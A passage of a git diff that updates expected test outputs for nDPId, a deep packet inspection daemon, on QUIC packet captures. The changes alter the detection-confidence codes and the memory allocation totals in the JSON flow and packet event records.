-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591267474847,"flow_last_seen":1591267474847,"flow_idle_time":200000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":1591267474847,"l3_proto":"ip4","src_ip":"10.9.0.2","dst_ip":"104.26.11.240","src_port":60106,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Cloudflare","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.wireshark.org","version":"TLSv1.3","alpn":"h3-28,h3-27","ja3":"1e022f87823477abd6a79c31d70062d7","tls_supported_versions":"TLSv1.3"}} +00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591267474847,"flow_last_seen":1591267474847,"flow_idle_time":200000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":1591267474847,"l3_proto":"ip4","src_ip":"10.9.0.2","dst_ip":"104.26.11.240","src_port":60106,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Cloudflare","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.wireshark.org","version":"TLSv1.3","alpn":"h3-28,h3-27","ja3":"1e022f87823477abd6a79c31d70062d7","tls_supported_versions":"TLSv1.3"}} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1591267474861,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1591267474861,"pkt":"bmImQfCg7jdRvai\/CABFAABL8YhAADkR0gRoGgvwCgkAAgG76soANzParQAAAAAUQMS6Zy9FF9Xn7IIP1UsQeHX9qMwQgoOBp4aIL+MPCXOdR4KiF\/8AABs="} 02063{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1591267474861,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1242,"pkt_l4_len":1208,"thread_ts_msec":1591267474861,"pkt":"7jdRvai\/bmImQfCgCABFAATMbsJAAEARSUoKCQACaBoL8OrKAbsEuILewv8AABsQgoOBp4aIL+MPCXOdR4KiFxRAxLpnL0UX1efsgg\/VSxB4df2ozABEgps603pxkyOuWqOuDCBHqFD5j6Z3HbedH1LdiS7r9g7eF1q+4GbQDzwEnV9STArM0Em4niSxcOP14YGEMbCxBeurtCEC8Tmf6DBDqyOKEQqlh98RR0FuyctJCM99u6oRT6urYJjdL6PSSu3YTL8HY6NviKj+LkpdTz6KmCgYvbgKd7NEhPEXmVYO+dL7mTC6YtcnEsrAHQU704mlKvqtFGL2\/5msnq\/TWBIk6bybV0DxYkGzE2Dnlwtw+dvrt9SpZJQBYmvuqQWRkw7Xl0Ri5Ou\/YH0Nf3CEwfW93dKkzcyI\/xYg9i+2QKy1ICjIZ\/JAWTdEHFRK8O6Gl0vStYOHFWBxnM\/YifVgYZg0OsrKE2RfzjKKmCKUpNz\/eEInpy3g7Oy6BASDjgCLyqH4KHC0RkRyxMeAwO\/4Ueuev5PR+GIZT6RPX+8eDG+GEJz8bGHJ80oLKupj5MfUtk1+qegg2dzVfHgOvprBxIArXCNmBUVNivV7wlObqf87COabZiPrwNrq3bed\/ALhpVnLbXDu3mPYFozof6hWLQUSRUCvRIP+L3zyyxfAOLZZ711TySAZxpgSSNbMb5wMga2ZxBCZGIiJBujBs0RFh65ea1D90334s1gOATeyFD6G0Y5nni0vv93RqV0rCUx5NmKsmees6Lb5Tn92zzlLElQ0tJj8i0NV+A1o9UmRJisTfKPDHGhnjIKCy7tWmA\/6WnyjC5MVpEofvbOp6VSLzrYFEbs4xO0nP5EWcI9akrhkBkR4BVPvA3BR\/JNC6qdA6XjZq7vEC4PK42e5TCzz\/lS4AoqV6qY+iOUqeRm\/KZeFGwLXw2YBxOFGvLQSYLCrM0JT+ZZ\/+YM0cgNTb4UsfslWeAa\/dEDn2K0d5vlVIufoqB2DscZriUDfkBrMe3p2BYO28jOG0dIt\/\/+wVszbGGjaG2DAkiTDrcM67+fz7k2j14PiNbU6+l0I0CfyoRbB67XXdFnPllMtNEGiR4aBRcQCCchbCVwdD7xGfKg8VLCKykEzUES\/y7hiagE2xpKTSbAUtzMYTnIbSLikbFGyfUOpyFdt16r3gk3qkldqup8CI9vmdvD1rvxsFHFdQKlm4ct28WVqNsM7AcMCYS4IdY3fjlHdgQeFzGauOLiE2HquU8FAgRipNJCs2vXSgmlj6qxAuSretb3YYCFUtS5vV7VhzZ\/si5aRaf72K7CkGDHBs9yzIrPzdtDp1CIjAcpqkTgTiqw5a7bneWQdm6knt9coPgKABTdfR1Wfei0Q3edydbubwRd1QyG5zjI0T9bXVZf85BmVvZ\/oiH86E0oC1c6Hyl3M4ke1W9+ncVNagK7XEVU\/lQ9u6NvkLWq7c7LzCfIQKMjglkD6IZxuZzbgX+IVXu+2\/W0iJnR1BIZqRhI1sURkCMk5kSbefJtA\/3ss1rR1eV5WU9Nj63Lk8fki45wlDZBMYeXWKNBze+M4K2DVnLaUMILrXDsu6YTHRFaaXufk6rRMF0IUC\/p6LhqvtpFhBb7T6xRXz1tVkXrpMYBZz4xjGSbfGjFB"} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":253,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":253,"flow_first_seen":1591267474847,"flow_last_seen":1591267477602,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":236167,"flow_avg_l4_payload_len":933,"midstream":0,"thread_ts_msec":1591267477602,"l3_proto":"ip4","src_ip":"10.9.0.2","dst_ip":"104.26.11.240","src_port":60106,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Cloudflare","breed":"Acceptable","category":"Web"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":253,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":253,"flow_first_seen":1591267474847,"flow_last_seen":1591267477602,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":236167,"flow_avg_l4_payload_len":933,"midstream":0,"thread_ts_msec":1591267477602,"l3_proto":"ip4","src_ip":"10.9.0.2","dst_ip":"104.26.11.240","src_port":60106,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Cloudflare","breed":"Acceptable","category":"Web"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":253,"source":"quic-28.pcap","alias":"nDPId-test","packets-captured":253,"packets-processed":253,"total-skipped-flows":0,"total-l4-payload-len":236167,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1591267477602} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 253/253 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5886789 bytes -~~ total memory freed........: 5886789 bytes -~~ total allocations/frees...: 118388/118388 +~~ total memory allocated....: 6020423 bytes +~~ total memory freed........: 6020423 bytes +~~ total allocations/frees...: 121150/121150 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 2068 chars diff --git a/test/results/quic-29.pcap.out b/test/results/quic-29.pcap.out index d0eba5aec..297009d41 100644 --- a/test/results/quic-29.pcap.out +++ b/test/results/quic-29.pcap.out @@ -2,10 +2,10 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-29.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1592171671664} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592171671664,"flow_last_seen":1592171671664,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1592171671664,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":36588,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02130{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1592171671664,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1592171671664,"pkt":"bmImQfCg7jdRvai\/CABFAAUA8Z1AAEARMDsKCQABCgkAAo7sAbsE7BkSwv8AAB0S824HvwtwiO8oxx1Iisqv85\/8EUOUTtoYvrflSLONN1vzwqO8AES3Q7WQp5eFbP47Q12xYKXOiuR8OKc8Zd+z5\/wDTiaB2gylmmpfXoWWnW9m4cfo29uCTrqUeoQcDlNjFKjOZThrp+QrfaDvzF+TP2mbdVAn5DVFyc3TGw9yc6eNagzixiAUYroBLFYv1DYB54ctmkUUCF38C+LrP5XSP2Zcs3QEOQDdiNvhWKUx+vneyJD2Ddv1Of313oIRItyeXVn2LxKac2RjP4PRAhodOpWDrnkB66u8HOFxUv4Q9HU8anll\/ZatcRtN\/kzzFFzf5YoYXwbtiynEhfyRDYp9NIa5aU5ngHDoeAIY8EqAjkZzDBZrpJEN70XKdgxbZ09x248vkii\/BYPsm8gwjS+Z+NMDUp5BndSqJan6LYduiBKS1FQ2ECMHPifIAeRkFfGsYIjcHELHJvd3bjIuQ5jcLDQ11GM29Aqw0CMdlCZ0GZUFJPoOBYtbWkB+AArzMv7l1fpdC85LE6kYaNSupy\/kxn4q0Fd9nlOil4czF7np40hmUQT5zuUOIMe57G4ak0l7jLPPFgnjPcuJ5+bhZHgxqEou6YPiVeaRUocITEWkE47FVdJ4XctN7CMWrbtrVTRyiKoG5jKjipRDy+FAnWpWY5dsQU4VKty4nhdiXpcyaazCMiTBlzAZlJ+9vVzyUo2gVZTdT1AmyQCJjmCzYg+wq4NqxE5hDx4BVlFY7VlIfT+LOXZeM++nsIOJaY7JaSW2i+1ji7jGvwvZ+l6xB5JTnisqnUTdF8GRkRAiTg25HBspHwtWrq\/Po4lqvzDZYM3JiaCh5C8UbvK9JJyDT8vEGu5LZu4vyW+zCsCEy6HtYm+Tl+y0wBH9TYuhybK9k4L\/MkebKAkQQeZPvBNwHsBWnmGK44Fke47qlm10TFPJJuYjv3s2WkxpofqtAF0qtGkvoZjB6BMweDMLBzljRd+MpcpgKx6R7LMPjs6dfEoyR\/++4fMZPmZ5nKh9L2NomKnJgnI\/Q7cjkj8+4G7DpTq\/5CiPCn768EbsWDr31eOflbsg2q5K0cAqBbvuSWrrcKEWWT9pbchcsh+CF4s8+eUg6FJomv69IBBZDRAHTYWn3VGlccxntEoW7HpxMfIbSnMt1P6bfNeHK9ADAu1LaTZlKkjjmK+gbjyes7l1CGt0SYwE5uDE0ieZjOn+NT2n96TJjl6343hGsZGGMospEVXz6DJx68jscskAGRLftunAK4Wcrbm0MVyZUbf68HXckrAHSl5ZN\/gbwXjHwC\/6kW\/aiMNhQdY8NhboJQcKwTMbOAeVwKF1KGzLGKNIqA8cRIBh1T1WLCqei3k8gd\/C7bxKNgXzYeJGw\/scGAKCWrce0B8GF8XORgu1hVv6Mwd\/suBo\/oG9g9Uq0JP+2Gj4EQHkZYzIbeC00Rkd0VLJzec5p8sOl7k1oJ2JxQnDqWq6c8EgrVrSv8x08C46hCl\/izdOK7GvwGEQaUkOOkL0AriEREHoeCFJRFtP85AqwidJch8tbK+7ugQPN0bUklhiKNfnQ3Ch72i6f0K8Dx8w3Oub6KBk7WsmEtFBIijRDgwb5rVjtiIuJyF+6hegy2WW6xf3iWQ7NMMjWxMe231j5YtMgDPBTVbFARaKzxZnq\/YZAw=="} -00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592171671664,"flow_last_seen":1592171671664,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1592171671664,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":36588,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"localhost","version":"TLSv1.3","alpn":"h3-29","ja3":"b3e43d74f4b790abca2f5fe7dd06e7cf","tls_supported_versions":"TLSv1.3"}} +00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592171671664,"flow_last_seen":1592171671664,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1592171671664,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":36588,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"localhost","version":"TLSv1.3","alpn":"h3-29","ja3":"b3e43d74f4b790abca2f5fe7dd06e7cf","tls_supported_versions":"TLSv1.3"}} 00594{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1592171671665,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":159,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":159,"pkt_l4_len":125,"thread_ts_msec":1592171671665,"pkt":"7jdRvai\/bmImQfCgCABFAACRmvtAAEARi0wKCQACCgkAAQG7juwAfRSj8P8AAB0RQ5RO2hi+t+VIs403W\/PCo7wSLpoy7UXJBmrU+awywdI8GeSAtpBzddspmsO4wBFhAc+lOZRs3AvW96rBMIqSb8d5pE1izlVnQvJ\/MknH+txz1mHxROZRbUIezbGG599\/tfDcAoDEnt9M4O+IUzLE"} 02135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1592171671666,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1592171671666,"pkt":"bmImQfCg7jdRvai\/CABFAAUA8Z5AAEARMDoKCQABCgkAAo7sAbsE7BkSzv8AAB0SLpoy7UXJBmrU+awywdI8GeSAEUOUTtoYvrflSLONN1vzwqO8O7aQc3XbKZrDuMARYQHPpTmUbNwL1veqwTCKkm\/HeaRNYs5VZ0LyfzJJx\/rcc9Zh8UTmUW1CHs2xhuffRHwK3nve7Gs3tZecUJrzqDFyJk9VgauDIb0Z+rvJbpolNkK6o7LgasAqmBRAbZcMPXVvUfKsLiSsD4SILcWD+XvuWr3Bh6tm+Qfkza+b6iZPubm3DVwSuys\/Xdp90g3J3Xk1P0fVr4\/DBW7XGGDkoxhXT\/JK9l4UPRIVyi5S\/s\/HCP+EDwylk5NF4afjQaGSFHvpGz1rfWgSbWW9+sMKYreG0NJGBDTiOkzrmoNuPwZsLcClKrT8DHkz+OgR9k4HlGmCBbxjhS5EqHAPTN0p9tNIZWR+C\/qUiEONzWWHajForYbyQn2DUiK6yBo+OQYvqxa3oZpGE1ifu6+st0otshaii7hYat8QkKrneLy15mdLcw7PZ9xSTYArs9hr4+vj1cqKUtxqRPTiLF4dCvRIhEX4wsiVHTQs1H5VlPwKxJq579LyeS+qFj4KdmvZBFiZFw+OSy3NncA0jvHpvDNazCZw8\/tYybqvtyop8EVUiQlHyJg8YNQ+aWO8ypOTwvNIGYKTaPxXZMvN35yLXrvtf4haVdzH0G1+kC1uUCGWP2BWNjQ\/TVG8grG7RsHGbnZn8RfXhU4qdScFjhJ31TwgAH0lYn4+u9lnJAIs5sT9WTUkrdZcS\/sM3LeHI6MKWpycP8D28jlxLUcx\/dMgCF27Jh3BsCbctlNdL8hYW38Zr2U49ykd7WZpXsGAA1nzsNfuIwfkQE4VyGHnLjXrXxRxrD6N7QDeL7eK3kUjZyC5W534QYFYrh0HWuZfiukwt3neFrc0vgyMMdUKTmaa96v1P5OJVaakJ7Ko50Ic\/ccvWMdP83+NPcs+7HRXK4yG1yRzMwkmF0e\/57Dhb4ZsYBnI3JAGnaJwAbPLn7nBCtX11JVis76ALA\/EFVyoyCMj1RVsAHT\/DccWKXtdquQdm5INifNuOA564SVFMA0ccofKzicAZJiC7kfXk6QXdl0MLrIa5kBoBc0Jy5c\/hRqi1jxPFSJ4InRQNc9l\/l2XOPXUXc7GNf40YnCF9ge02seRVw5QgAxzztym8sQ\/GYuUd0UgGwdukDWiwqiuJGtn0Mf0hSpoDxXo0GxXy5ROaCq+Yj9+rOhxfWf+y2j1esQpB+lboWDqRNGPph3H9QluST7Lui0v+n2oEV84+fsaSRoIRNleP\/qkuvCpXsIrFGtk7NdB1Z8Zdm3+Q8oB0824BsnbIqBS6PVSMa5uQ7IDT19Rii201P9HjbIFdWd6f4nkoa7QLBzeQZCl5mk4NmwWPlKeVRJy8VolVes2J755oyt5f4B18ZbY7A13RZDfxUDmg9vvPRXS5gGtrj7EEBsE5b+jNiBsYGPfCajHLvvXuZJzWTgs5GIF2fZMlW3pKokAdhk\/JtyHS9+vfZXldxcnCxBcwh\/+X5Jvp0OY666uN2Hix0VsHswxfto+CE3l1fROmKv5hQv6DrppojEXU\/Bywn1HyxPBMx4G4LIAeSl0XzQ9LpI\/snJgv3oFDbMQMXW6dKIL6toQLmRPmeW2MoTht4gvwKXj8RRQP4umFHd\/MZAMVQ=="} -00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1592171671664,"flow_last_seen":1592171671699,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1592171671699,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":36588,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1592171671664,"flow_last_seen":1592171671699,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1592171671699,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":36588,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":15,"source":"quic-29.pcap","alias":"nDPId-test","packets-captured":15,"packets-processed":15,"total-skipped-flows":0,"total-l4-payload-len":8756,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1592171671699} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 15/15 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879986 bytes -~~ total memory freed........: 5879986 bytes -~~ total allocations/frees...: 118150/118150 +~~ total memory allocated....: 6013620 bytes +~~ total memory freed........: 6013620 bytes +~~ total allocations/frees...: 120912/120912 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 2140 chars diff --git a/test/results/quic-33.pcapng.out b/test/results/quic-33.pcapng.out index c31ec36a4..503b3a94f 100644 --- a/test/results/quic-33.pcapng.out +++ b/test/results/quic-33.pcapng.out @@ -2,10 +2,10 @@ 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-33.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1607938456563} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1607938456563,"flow_last_seen":1607938456563,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1607938456563,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":51430,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1607938456563,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1607938456563,"pkt":"AAAAAAAAAAAAAAAAht1gIDHwBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAByOYRWwTYBOvLAAAAAQiH9eh3C8+VTAijB72XkxHdoQBEtoviUAck6tyLLoPW9VDwFsyJg3YOj5\/ZBBxoLZq+uwOezSI+NQXptD5by+TGWuPRPrDAYZviuXsVHC7HmqDeEDG8QAq3dV\/xeXm5rkywye7b+vdo1p1fctM\/Oux9r7eV+Bkfx5+wJ0fdvlhyFGnTrwdcg8+4C7doPPgPdg\/HlJ+WJBdBNlB5bMDPwE7kBX2Dh4rUsRtMuI8UcuXEYHPlESOyFKyqmw1DOdGJ\/piVc003W0\/LEq1Eo7qm+0VXxD0O2HOCIiEHQSR0LHjT1VxLfzhAmJaat83P4NhBjDwwPEBaziMk5Xx7FlGTbjmQXwNdCCRvlZwHV8Z1FjV1KFEWUlByB6YIRcrWgtYq\/i+4joHr0arERD7m6OPY7fw34Aislp\/J5tfwN5lpBEW4eq0YBQWIW+o0WsbDygLLOE8qK7VrIW545\/s6vWmiqY\/nX3eqKbXLLa\/FVUoUAYah6VY+54jT2WSxlVbjRbKzNCmQ7iFaNpCpIEDqRUT3251KkF2ic95oNqA7SdIHar3DhA1BLknCroi9vMu8dB8ZQzinHdG0dXM7MT\/3xjsj6W1BusBxpaKNCgk4AWnV4woWWMHuv3AkSN3SkyzvUkLVvh69eozjggDPPRwSQSUAzHDWzbhw1M0maJHN9uf4A3ju1BNcFXtgNbzbLvZ8jRjuvbV5+sT2dKCIGszHbDe\/k7VIj14F5Oz9yEIDLSjcjUNYxAEtmmIW3gkE0URoURbr4fR+9IcL0qzkw6dXZu343bgbz5HR6MUnSxTpV9fqwSf9hnrNjraoPMA+2dRpP1Zgg8SJxppmH92oRToz9aDvX2GEC3Onm3NhLiCy9XRFGhGu\/fP4euaO\/LhZROPQcNzbK0KhgrgIkbbcdw+GG0U1DyrSN2MCSa0G\/gdd0iXjRkpuSltfEWcs6h5VKXYCs0nARTLsAmshRBI4tBnyE8czB9KDGhDi69S4dxLc2GhDvI7sBC3oYplXnPFpYJ5UZlYX4x4JzCNfzPKJLkB1GZ\/\/fH4d4Bdn3o+N0leV4SXwVyj8+XQXm2lqcn0l4280XR1PY9wT7WxHSwRDVHU1WF+J6uEthL0G\/TTOA8IENfk0c9FtN1gtuZbVqEenj8UavApG8YgiwEFLw3lw7QwEpdl2suMFgNMJ9GKiLgGbJ0iDoFumS7lgCZ\/nQNWC5kLAQ+6RwzRxTfyP7COmrj9VOCl2+wDLTe3MfV2rc9okYbhZWBQ90PNxn4RsPjc\/Y6ROnBtAhNHbhNOY4vkKTiqPf\/zXa6gyKLJwM4B2ikSmnMEc6pOt0km1BxO3IMATJR3y2TyvQwDT4h3LmpQf0gEdwRzggs5B+E7eqr4GF3leCUThvLN07bE6f2xjlfM9GVfW\/hyXIlfEkPiVHs0uNEuAtqja9wjv+TVSELvsqoLajQtysd2XscH\/uqkhI80k6EzletW\/z347Tefjbi7un6kw52zxXR3upATGEcY8WECkFSms+LV3Cbtq+fVkM8LR8ZIcoDoUWH511e8PHOE07KwOpTJwROur3JKswX2UtackuKBEnRIb2VrFAu8O8Bq\/G9385WeZn1kznfucxDKavwZd9obaQ66d2I\/H3+7RezClYA=="} -01080{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1607938456563,"flow_last_seen":1607938456563,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1607938456563,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":51430,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"version":"TLSv1.3","alpn":"h3-33,hq-33,h3-32,hq-32,h3-31,hq-31,h3-29,hq-29","ja3":"0299b052ace53a14c3a04aceb5efd247","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} +01080{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1607938456563,"flow_last_seen":1607938456563,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1607938456563,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":51430,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS 